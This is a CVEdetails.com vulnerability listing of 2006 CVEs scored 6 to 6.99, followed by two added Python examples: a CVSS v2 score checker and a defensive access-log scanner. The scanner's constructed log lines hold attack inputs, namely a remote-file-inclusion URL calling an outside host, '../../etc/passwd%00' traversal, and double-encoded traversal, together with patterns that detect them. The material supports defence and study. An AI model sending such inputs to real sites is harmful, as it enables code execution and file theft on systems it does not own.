CVEdetails.com the ultimate security vulnerability data source

Security Vulnerabilities (CVSS score between 6 and 6.99)

Columns (each entry below is printed on four lines: header fields, CVSS v2 score, access/impact metrics, description):
# | CVE ID | CWE ID | # of Exploits | Vulnerability Type(s) | Publish Date | Update Date
Score
Gained Access Level | Access | Complexity | Authentication | Conf. | Integ. | Avail.
15251 CVE-2006-2682 Exec Code File Inclusion 2006-05-31 2017-10-18
6.4
None Remote Low Not required Partial Partial None
PHP remote file inclusion vulnerability in BE_config.php in Back-End CMS 0.7.2.1 and earlier allows remote attackers to execute arbitrary PHP code via a URL in the _PSL[classdir] parameter.
15252 CVE-2006-2681 94 Exec Code File Inclusion 2006-05-31 2017-07-19
6.8
None Remote Medium Not required Partial Partial Partial
PHP remote file inclusion vulnerability in SocketMail Lite and Pro 2.2.6 and earlier, when register_globals and magic_quotes are enabled, allows remote attackers to execute arbitrary PHP code via a URL in the site_path parameter to (1) index.php and (2) inc-common.php.
15253 CVE-2006-2673 XSS 2006-05-30 2018-10-18
6.8
User Remote Medium Not required Partial Partial Partial
Cross-site scripting (XSS) vulnerability in search.html in Bulletin Board Elite-Board (E-Board) 1.1 allows remote attackers to inject arbitrary web script or HTML via the search box.
15254 CVE-2006-2672 Sql XSS 2006-05-30 2018-10-18
6.8
User Remote Medium Not required Partial Partial Partial
Multiple cross-site scripting (XSS) vulnerabilities in Realty Pro One allow remote attackers to inject arbitrary web script or HTML via the (1) listingid parameter to (a) images.php, (b) index_other.php, or (c) request_info.php; (2) propertyid parameter to (d) searchlookup.php, (3) id parameter to (e) images.php, or (4) agentid parameter to (f) request_info.php. NOTE: some of these issues might be resultant from SQL injection.
15255 CVE-2006-2655 Bypass 2006-06-01 2017-07-19
6.4
None Remote Low Not required Partial Partial None
The build process for ypserv in FreeBSD 5.3 up to 6.1 accidentally disables access restrictions when using the /var/yp/securenets file, which allows remote attackers to bypass intended access restrictions.
15256 CVE-2006-2654 Dir. Trav. 2006-06-01 2017-07-19
6.4
None Remote Low Not required Partial Partial None
Directory traversal vulnerability in smbfs on FreeBSD 4.10 up to 6.1 allows local users to escape chroot restrictions for an SMB-mounted filesystem via "..\\" sequences. NOTE: this is similar to CVE-2006-1864, but this is a different implementation of smbfs, so it has a different CVE identifier.
15257 CVE-2006-2652 XSS 2006-05-30 2018-10-18
6.8
User Remote Medium Not required Partial Partial Partial
Cross-site scripting (XSS) vulnerability in WikiNi 0.4.2 and earlier allows remote attackers to inject arbitrary HTML and web script by editing a Wiki page to contain the script.
15258 CVE-2006-2649 79 XSS 2006-05-30 2017-07-19
6.8
User Remote Medium Not required Partial Partial Partial
Multiple cross-site scripting (XSS) vulnerabilities in (a) search.php, (b) search_cat.php, (c) search_price.php, and (d) product_details.php in the cosmicshop directory for CosmicShoppingCart allow remote attackers to inject arbitrary web script or HTML via multiple unspecified parameters, as demonstrated by the (1) query parameter in search.php and the (2) data parameter in search_cat.php.
15259 CVE-2006-2638 Exec Code Sql 2006-05-30 2018-10-18
6.4
None Remote Low Not required Partial Partial None
SQL injection vulnerability in member.asp in qjForum allows remote attackers to execute arbitrary SQL commands via the uName parameter.
15260 CVE-2006-2590 Exec Code Sql 2006-05-25 2008-09-05
6.4
None Remote Low Not required Partial Partial None
SQL injection vulnerability in e107 before 0.7.5 allows remote attackers to execute arbitrary SQL commands via unknown attack vectors.
15261 CVE-2006-2589 Exec Code Sql 2006-05-25 2018-10-18
6.4
None Remote Low Not required Partial Partial None
SQL injection vulnerability in rss.php in MyBB (aka MyBulletinBoard) 1.1.1 allows remote attackers to execute arbitrary SQL commands via the comma parameter. NOTE: it is not clear from the original report how this attack can succeed, since the demonstration URL uses a variable that is overwritten with static data in the extracted source code.
15262 CVE-2006-2585 Exec Code Sql 2006-05-25 2017-07-19
6.4
None Remote Low Not required Partial Partial None
SQL injection vulnerability in Destiney Links Script 2.1.2 allows remote attackers to execute arbitrary SQL commands via the ID parameter. NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
15263 CVE-2006-2557 Exec Code File Inclusion 2006-05-23 2017-10-18
6.4
None Remote Low Not required Partial Partial None
PHP remote file inclusion vulnerability in extras/poll/poll.php in Florian Amrhein NewsPortal before 0.37, and TR Newsportal (TRanx rebuilded), allows remote attackers to execute arbitrary PHP code via a URL in the file_newsportal parameter.
15264 CVE-2006-2554 Exec Code Overflow 2006-05-23 2018-10-18
6.4
None Remote Low Not required Partial Partial None
Buffer overflow in the tell_player_surr_changes function in Genecys 0.2 and earlier might allow remote attackers to execute arbitrary code via long arguments.
15265 CVE-2006-2532 Sql 2006-05-22 2018-10-18
6.4
None Remote Low Not required Partial Partial None
stats.php in Destiney Rated Images Script 0.5.0 allows remote attackers to obtain the installation path via an invalid s parameter, which displays the path in an error message. NOTE: this issue was originally claimed to be SQL injection, but CVE analysis shows that the problem is related to an invalid value that prevents some variables from being set.
15266 CVE-2006-2528 Exec Code File Inclusion 2006-05-22 2017-07-19
6.4
None Remote Low Not required Partial Partial None
PHP remote file inclusion vulnerability in classified_right.php in phpBazar 2.1.0 and earlier allows remote attackers to execute arbitrary PHP code via a URL in the language_dir parameter.
15267 CVE-2006-2526 Exec Code File Inclusion 2006-05-22 2018-10-18
6.4
None Remote Low Not required Partial Partial None
PHP remote file inclusion vulnerability in index.php in PHP Easy Galerie 1.1 allows remote attackers to execute arbitrary PHP code via a URL in the includepath parameter.
15268 CVE-2006-2525 Exec Code Sql 2006-05-22 2017-07-19
6.4
None Remote Low Not required Partial Partial None
SQL injection vulnerability in UseBB 1.0 RC1 and earlier allows remote attackers to execute arbitrary SQL commands via the member list search module.
15269 CVE-2006-2524 XSS 2006-05-22 2017-07-19
6.8
None Remote Medium Not required Partial Partial Partial
Cross-site scripting (XSS) vulnerability in UseBB 1.0 RC1 and earlier allows remote attackers to inject arbitrary web script or HTML via unspecified vectors when processing the user date format.
15270 CVE-2006-2515 XSS 2006-05-22 2018-10-18
6.8
User Remote Medium Not required Partial Partial Partial
Cross-site scripting (XSS) vulnerability in index.php in Hiox Guestbook 3.1 allows remote attackers to inject arbitrary web script or HTML via the input forms for signing the guestbook.
15271 CVE-2006-2512 Exec Code Sql 2006-05-22 2017-07-19
6.5
User Remote Low Single system Partial Partial Partial
SQL injection vulnerability in Hitachi EUR Professional Edition, EUR Viewer, EUR Print Service, and EUR Print Service for ILF allows remote authenticated users to execute arbitrary SQL commands via unknown attack vectors.
15272 CVE-2006-2511 2006-05-22 2018-10-18
6.5
User Remote Low Single system Partial Partial Partial
The ActiveX version of FrontRange iHEAT allows remote authenticated users to run arbitrary programs or access arbitrary files on the host machine by uploading a file with an extension that is not associated with an application, and selecting a file from the "Open With..." dialog.
15273 CVE-2006-2510 XSS 2006-05-22 2018-10-18
6.8
User Remote Medium Not required Partial Partial Partial
Cross-site scripting (XSS) vulnerability in the URL submission form in YourFreeWorld.com Short Url & Url Tracker Script allows remote attackers to inject arbitrary web script or HTML via an unspecified form for submitting URLs.
15274 CVE-2006-2508 Exec Code Sql 2006-05-22 2018-10-18
6.4
None Remote Low Not required None Partial Partial
SQL injection vulnerability in tr1.php in YourFreeWorld.com Stylish Text Ads Script allows remote attackers to execute arbitrary SQL commands via the id parameter, possibly involving an attack vector using advertise.php.
15275 CVE-2006-2506 79 XSS 2006-05-22 2018-10-18
6.8
User Remote Medium Not required Partial Partial Partial
Multiple cross-site scripting (XSS) vulnerabilities in search.php in Sphider allow remote attackers to inject arbitrary web script or HTML via (1) the PATH_INFO and (2) the category parameter.
15276 CVE-2006-2501 XSS 2006-05-19 2017-07-19
6.8
User Remote Medium Not required Partial Partial Partial
Cross-site scripting (XSS) vulnerability in Sun ONE Web Server 6.0 SP9 and earlier, Java System Web Server 6.1 SP4 and earlier, Sun ONE Application Server 7 Platform and Standard Edition Update 6 and earlier, and Java System Application Server 7 2004Q2 Standard and Enterprise Edition Update 2 and earlier, allows remote attackers to inject arbitrary web script or HTML via unknown attack vectors, possibly involving error messages.
15277 CVE-2006-2500 XSS 2006-05-19 2018-10-18
6.8
User Remote Medium Not required Partial Partial Partial
Cross-site scripting (XSS) vulnerability in add_news.asp in CodeAvalanche News (CANews) 1.2 allows remote attackers to inject arbitrary web script or HTML via the Headline field. NOTE: if this issue is limited to administrators, and if it is expected behavior for administrators to be able to generate HTML, then this is not a vulnerability.
15278 CVE-2006-2498 2006-05-19 2017-07-19
6.4
None Remote Low Not required Partial Partial None
Invision Power Board (IPB) before 2.1.6 allows remote attackers to execute arbitrary PHP script via attack vectors involving (1) the post_icon variable in classes/post/class_post.php and (2) the df value in action_public/moderate.php.
15279 CVE-2006-2491 XSS 2006-05-19 2018-10-18
6.8
User Remote Medium Not required Partial Partial Partial
Cross-site scripting (XSS) vulnerability in (1) index.php and (2) bmc/admin.php in BoastMachine (bMachine) 3.1 and earlier allows remote attackers to inject arbitrary web script or HTML via the query string, which is not properly filtered when it is accessed using the $_SERVER["PHP_SELF"] variable.
15280 CVE-2006-2486 Exec Code Sql 2006-05-19 2018-10-18
6.4
None Remote Low Not required Partial Partial None
SQL injection vulnerability in find.php in YapBB 1.2 Beta2 and earlier allows remote attackers to execute arbitrary SQL commands via the userID parameter.
15281 CVE-2006-2483 Exec Code File Inclusion 2006-05-19 2017-10-18
6.4
None Remote Low Not required Partial Partial None
PHP remote file inclusion vulnerability in cart_content.php in Squirrelcart 2.2.2 and earlier allows remote attackers to execute arbitrary PHP code via a URL in the cart_isp_root parameter.
15282 CVE-2006-2482 119 Exec Code Overflow 2006-09-08 2017-07-19
6.8
User Remote Medium Not required Partial Partial Partial
Heap-based buffer overflow in the TZipTV component in (1) ZipTV for Delphi 7 2006.1.26 and for C++ Builder 2006-1.16, (2) PentaZip 8.5.1.190 and PentaSuite-PRO 8.5.1.221, and possibly other products, allows user-assisted attackers to execute arbitrary code via an ARJ archive with a long header. NOTE: the ACE archive vector is covered by CVE-2005-2856.
15283 CVE-2006-2460 Dir. Trav. File Inclusion 2006-05-19 2018-10-18
6.4
None Remote Low Not required Partial Partial None
Sugar Suite Open Source (SugarCRM) 4.2 and earlier, when register_globals is enabled, does not protect critical variables such as $_GLOBALS and $_SESSION from modification, which allows remote attackers to conduct attacks such as directory traversal or PHP remote file inclusion, as demonstrated by modifying the GLOBALS[sugarEntry] parameter.
15284 CVE-2006-2459 Exec Code Sql 2006-05-19 2018-10-18
6.4
None Remote Low Not required Partial Partial None
SQL injection vulnerability in messages.php in PHP-Fusion 6.00.307 and earlier allows remote authenticated users to execute arbitrary SQL commands via the srch_where parameter.
15285 CVE-2006-2435 2006-05-17 2009-06-17
6.4
None Remote Low Not required Partial Partial None
Unspecified vulnerability in IBM WebSphere Application Server 5.0.2 and earlier, and 5.1.1 and earlier, has unknown impact and attack vectors related to "Inserting certain script tags in urls [that] may allow unintended execution of scripts."
15286 CVE-2006-2428 Exec Code Bypass 2006-05-17 2018-10-18
6.4
None Remote Low Not required Partial Partial None
add.asp in DUware DUbanner 3.1 allows remote attackers to execute arbitrary code by uploading files with arbitrary extensions, such as ASP files, probably due to client-side enforcement that can be bypassed. NOTE: some of these details are obtained from third party information, since the raw source is vague.
15287 CVE-2006-2426 DoS 2006-05-17 2018-10-18
6.4
None Remote Low Not required None Partial Partial
Sun Java Runtime Environment (JRE) 1.5.0_6 and earlier, JDK 1.5.0_6 and earlier, and SDK 1.5.0_6 and earlier allows remote attackers to cause a denial of service (disk consumption) by using the Font.createFont function to create temporary files of arbitrary size in the %temp% directory.
15288 CVE-2006-2418 XSS 2006-05-16 2017-07-19
6.8
User Remote Medium Not required Partial Partial Partial
Cross-site scripting (XSS) vulnerabilities in certain versions of phpMyAdmin before 2.8.0.4 allow remote attackers to inject arbitrary web script or HTML via the db parameter in unknown scripts.
15289 CVE-2006-2405 Dir. Trav. 2006-05-16 2018-10-18
6.8
User Remote Medium Not required Partial Partial Partial
Directory traversal vulnerability in unb_lib/abbc.conf.php in Unclassified NewsBoard (UNB) 1.6.1 patch 1 and earlier, when register_globals is enabled, allows remote attackers to include arbitrary files via .. (dot dot) sequences and a trailing null byte (%00) in the ABBC[Config][smileset] parameter to unb_lib/abbc.css.php.
15290 CVE-2006-2404 Dir. Trav. 2006-05-15 2018-10-18
6.4
None Remote Low Not required Partial Partial None
Directory traversal vulnerability in popup.php in RadScripts RadLance Gold 7.0 allows remote attackers to read arbitrary files via a .. (dot dot) in the read parameter.
15291 CVE-2006-2392 Exec Code File Inclusion 2006-05-15 2017-10-18
6.4
None Remote Low Not required Partial Partial None
PHP remote file inclusion vulnerability in public_includes/pub_popup/popup_finduser.php in PHP Blue Dragon Platinum 2.8.0 allows remote attackers to execute arbitrary PHP code via a URL in the vsDragonRootPath parameter.
15292 CVE-2006-2386 Exec Code 2006-12-12 2018-10-18
6.8
User Remote Medium Not required Partial Partial Partial
Unspecified vulnerability in Microsoft Outlook Express 6 and earlier allows remote attackers to execute arbitrary code via a crafted contact record in a Windows Address Book (WAB) file.
15293 CVE-2006-2378 Exec Code Overflow 2006-06-13 2018-10-12
6.8
User Remote Medium Not required Partial Partial Partial
Buffer overflow in the ART Image Rendering component (jgdw400.dll) in Microsoft Windows XP SP1 and SP2, Server 2003 SP1 and earlier, and Windows 98 and Me allows remote attackers to execute arbitrary code via a crafted ART image that causes heap corruption.
15294 CVE-2006-2349 Exec Code XSS 2006-05-12 2018-10-18
6.8
User Remote Medium Not required Partial Partial Partial
E-Business Designer (eBD) 3.1.4 and earlier allows remote attackers to upload or modify arbitrary files, and execute arbitrary code, via a direct request to (1) common/html_editor/image_browser.upload.html, (2) common/html_editor/image_browser.html, or (3) common/html_editor/html_editor.html. NOTE: this can also be used for cross-site scripting (XSS) attacks by uploading cascading style sheet (.CSS) files.
15295 CVE-2006-2344 Exec Code Sql 2006-05-12 2017-07-19
6.4
None Remote Low Not required Partial Partial None
SQL injection vulnerability in inc/elementz.php in AliPAGER 1.5, with magic_quotes_gpc disabled, allows remote attackers to execute arbitrary SQL commands via the ubild parameter.
15296 CVE-2006-2339 Exec Code Sql 2006-05-11 2017-07-19
6.4
None Remote Low Not required Partial Partial None
SQL injection vulnerability in index.php in evoTopsites 2.x and evoTopsites Pro 2.x allows remote attackers to execute arbitrary SQL commands via the (1) cat_id and (2) id parameters.
15297 CVE-2006-2336 Exec Code Sql 2006-05-11 2018-10-18
6.4
None Remote Low Not required Partial Partial None
SQL injection vulnerability in showthread.php in MyBB (aka MyBulletinBoard) 1.1.1 allows remote attackers to execute arbitrary SQL commands via the comma parameter.
15298 CVE-2006-2335 Exec Code 2006-05-11 2018-10-18
6.5
User Remote Low Single system Partial Partial Partial
Jelsoft vBulletin accepts uploads of Cascading Style Sheets (CSS) and processes them in a way that allows remote authenticated administrators to gain shell access by uploading a CSS file that contains PHP code, then selecting the file via the style chooser, which causes the PHP code to be executed. NOTE: the vendor was unable to reproduce this issue in 3.5.x. NOTE: this issue might be due to direct static code injection.
15299 CVE-2006-2333 Exec Code Sql 2006-05-11 2018-10-18
6.4
None Remote Low Not required Partial Partial None
Multiple SQL injection vulnerabilities in MyBB (aka MyBulletinBoard) 1.1.1 allow remote attackers to execute arbitrary SQL commands via the e-mail address when registering for a forum that requires e-mail verification, which is not properly handled in (1) usercp.php and (2) member.php.
15300 CVE-2006-2331 Dir. Trav. 2006-05-11 2018-10-18
6.4
None Remote Low Not required Partial Partial None
Multiple directory traversal vulnerabilities in PHP-Fusion 6.00.306 allow remote attackers to include and execute arbitrary local files via (1) a .. (dot dot) in the settings[locale] parameter in infusions/last_seen_users_panel/last_seen_users_panel.php, and (2) a .. (dot dot) in the localeset parameter in setup.php. NOTE: the vendor states that this issue might exist due to problems in third party local files.
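Every entry above lists a score plus a metric row such as "None Remote Low Not required Partial Partial None", and only four distinct (score, row) pairs occur on this page: 6.4, 6.8 and 6.5. The check a reader may want is whether the printed score actually follows from the printed metrics. The following is an added example, not CVEdetails code: it maps the page's column vocabulary onto CVSS v2 metric letters ("Remote" is AV:N; "Gained Access Level" is a CVEdetails column that does not enter the base equation and is parsed but ignored), applies the public CVSS v2 base-score equation, and recomputes each of the page's rows. The row parser and the PAGE_ROWS table are this example's own.

```python
"""Recompute the CVSS v2 base score from the metric row printed under each
entry in this table, to check that the listed score matches its vector.
Added example; the weights are the public CVSS v2 base equation, the column
vocabulary is CVEdetails' own, and the row parser is this example's."""
import re
from decimal import Decimal, ROUND_HALF_UP

# Page vocabulary -> (CVSS v2 metric letter, weight).
# "Remote" is CVSS AV:N. The leading "Gained Access Level" word (None/User/Admin)
# is a CVEdetails column with no role in the base equation; it is parsed and ignored.
ACCESS_VECTOR = {"Local": ("L", 0.395), "Adjacent Network": ("A", 0.646), "Remote": ("N", 1.0)}
ACCESS_COMPLEXITY = {"High": ("H", 0.35), "Medium": ("M", 0.61), "Low": ("L", 0.71)}
AUTHENTICATION = {"Multiple system": ("M", 0.45), "Single system": ("S", 0.56), "Not required": ("N", 0.704)}
IMPACT = {"None": ("N", 0.0), "Partial": ("P", 0.275), "Complete": ("C", 0.660)}

ROW_RE = re.compile(
    r"^(?P<gained>None|User|Admin)\s+"
    r"(?P<av>Local|Adjacent Network|Remote)\s+"
    r"(?P<ac>Low|Medium|High)\s+"
    r"(?P<au>Not required|Single system|Multiple system)\s+"
    r"(?P<c>None|Partial|Complete)\s+"
    r"(?P<i>None|Partial|Complete)\s+"
    r"(?P<a>None|Partial|Complete)\s*$"
)


def cvss2_base(access, complexity, auth, conf, integ, avail):
    """CVSS v2 base score from the page's metric words, rounded half-up to 0.1."""
    impact = 10.41 * (1 - (1 - IMPACT[conf][1]) * (1 - IMPACT[integ][1]) * (1 - IMPACT[avail][1]))
    exploitability = 20 * ACCESS_VECTOR[access][1] * ACCESS_COMPLEXITY[complexity][1] * AUTHENTICATION[auth][1]
    f_impact = 0 if impact == 0 else 1.176   # no impact at all scores 0.0 by definition
    raw = (0.6 * impact + 0.4 * exploitability - 1.5) * f_impact
    return float(Decimal(repr(raw)).quantize(Decimal("0.1"), rounding=ROUND_HALF_UP))


def parse_row(line):
    """Split one printed metric row into (AV, AC, Au, C, I, A) words."""
    m = ROW_RE.match(line.strip())
    if not m:
        raise ValueError(f"unrecognised metric row: {line!r}")
    g = m.groupdict()
    return (g["av"], g["ac"], g["au"], g["c"], g["i"], g["a"])


def vector_from_row(line):
    """Render the printed row as a CVSS v2 vector string."""
    av, ac, au, c, i, a = parse_row(line)
    return (f"AV:{ACCESS_VECTOR[av][0]}/AC:{ACCESS_COMPLEXITY[ac][0]}/Au:{AUTHENTICATION[au][0]}"
            f"/C:{IMPACT[c][0]}/I:{IMPACT[i][0]}/A:{IMPACT[a][0]}")


def score_from_row(line):
    return cvss2_base(*parse_row(line))


def check_rows(rows):
    """rows: [(listed_score, metric_row)] -> [(metric_row, listed, recomputed)] for mismatches."""
    mismatches = []
    for listed, row in rows:
        recomputed = score_from_row(row)
        if recomputed != float(listed):
            mismatches.append((row, float(listed), recomputed))
    return mismatches


# The distinct (score, metric row) pairs that occur in the table above.
PAGE_ROWS = [
    (6.4, "None Remote Low Not required Partial Partial None"),
    (6.8, "User Remote Medium Not required Partial Partial Partial"),
    (6.5, "User Remote Low Single system Partial Partial Partial"),
    (6.4, "None Remote Low Not required None Partial Partial"),
]

if __name__ == "__main__":
    for listed, row in PAGE_ROWS:
        print(listed, vector_from_row(row), score_from_row(row))
    print("mismatches:", check_rows(PAGE_ROWS))
```

All four rows recompute to their printed scores, which is also why rows with C:P/I:P/A:N and C:N/I:P/A:P both show 6.4: the impact sub-score depends only on how many of the three impacts are Partial, not which ones.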
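Most of the PHP entries above share three request shapes: a full URL supplied in a parameter that the script passes to include() (CVE-2006-2682, CVE-2006-2528, CVE-2006-2526, CVE-2006-2483, CVE-2006-2392 and the register_globals cases CVE-2006-2681 and CVE-2006-2460), ".." sequences in a parameter that names a file (CVE-2006-2404, CVE-2006-2331), and a trailing %00 to cut off whatever suffix the script appends (CVE-2006-2405). The following is an added example, not code from CVEdetails or from any of the listed vendors: a scanner that pulls the query string out of common-log-format request lines and tags parameter values that match those shapes. The log lines are constructed; the hosts, IPs and paths are made up and only the parameter names echo entries in the table. It percent-decodes until the value stops changing so that a double-encoded "..%252F" is caught, and treats a backslash like a slash for the "..\\" form noted under CVE-2006-2654.

```python
"""Scan access-log request lines for the parameter shapes behind the PHP remote
file inclusion and directory-traversal entries in this table (a URL supplied
where a path is expected, ".." sequences, and a trailing null byte).
Added example; not CVEdetails or vendor code."""
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Constructed sample lines in common log format. Hosts, IPs and paths are made
# up; only the parameter names echo entries in the table above.
SAMPLE_LOG = """\
10.0.0.5 - - [22/May/2006:10:01:02 +0000] "GET /bazar/classified_right.php?language_dir=http://203.0.113.9/s.txt? HTTP/1.1" 200 512
10.0.0.6 - - [22/May/2006:10:01:03 +0000] "GET /gal/index.php?includepath=../../../../etc/passwd%00 HTTP/1.1" 200 1203
10.0.0.7 - - [22/May/2006:10:01:04 +0000] "GET /unb/unb_lib/abbc.css.php?ABBC[Config][smileset]=..%2F..%2F..%2Fetc%2Fpasswd%00 HTTP/1.1" 200 77
10.0.0.8 - - [22/May/2006:10:01:05 +0000] "GET /rad/popup.php?read=..%252F..%252Fconfig.php HTTP/1.1" 200 41
10.0.0.9 - - [22/May/2006:10:01:06 +0000] "GET /shop/search.php?query=laptop&page=2 HTTP/1.1" 200 9001
"""

REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
RFI_SCHEME_RE = re.compile(r"^(?:https?|ftp)://", re.IGNORECASE)


def fully_decode(value, max_rounds=3):
    """Percent-decode until the string stops changing, so that a
    double-encoded ..%252F (-> ..%2F -> ../) is not missed."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def classify_param(value):
    """Return the tags that apply to one parameter value (already decoded once)."""
    tags = []
    v = fully_decode(value)
    if RFI_SCHEME_RE.match(v):
        tags.append("rfi-url")          # a remote URL where include()/require() expects a path
    normalized = v.replace("\\", "/")   # "..\\" (smbfs style) counts the same as "../"
    if "../" in normalized or normalized.endswith("/.."):
        tags.append("dir-traversal")
    if "\x00" in v:
        tags.append("null-byte")        # %00 truncates the path in the PHP versions of that era
    return tags


def scan_line(line):
    """Return [(parameter_name, tag), ...] for one access-log line."""
    m = REQUEST_RE.search(line)
    if not m:
        return []
    query = urlsplit(m.group("target")).query
    hits = []
    # parse_qsl percent-decodes once; keep_blank_values keeps "p=" style parameters
    for name, value in parse_qsl(query, keep_blank_values=True):
        for tag in classify_param(value):
            hits.append((name, tag))
    return hits


def scan_log(text):
    """Return [(line_number, hits)] for every line with at least one hit."""
    results = []
    for number, line in enumerate(text.splitlines(), start=1):
        hits = scan_line(line)
        if hits:
            results.append((number, hits))
    return results


if __name__ == "__main__":
    for number, hits in scan_log(SAMPLE_LOG):
        print(number, hits)
```

Lines 1 to 4 are flagged and the ordinary search on line 5 is not. The double-encoded line is reported as traversal even though PHP itself decodes only once; that is deliberate for a log scanner, since a request shaped that way is worth a look regardless of whether it worked. Anything on a POST body or in a cookie is outside what an access log records, so this only covers the query-string vectors the entries describe.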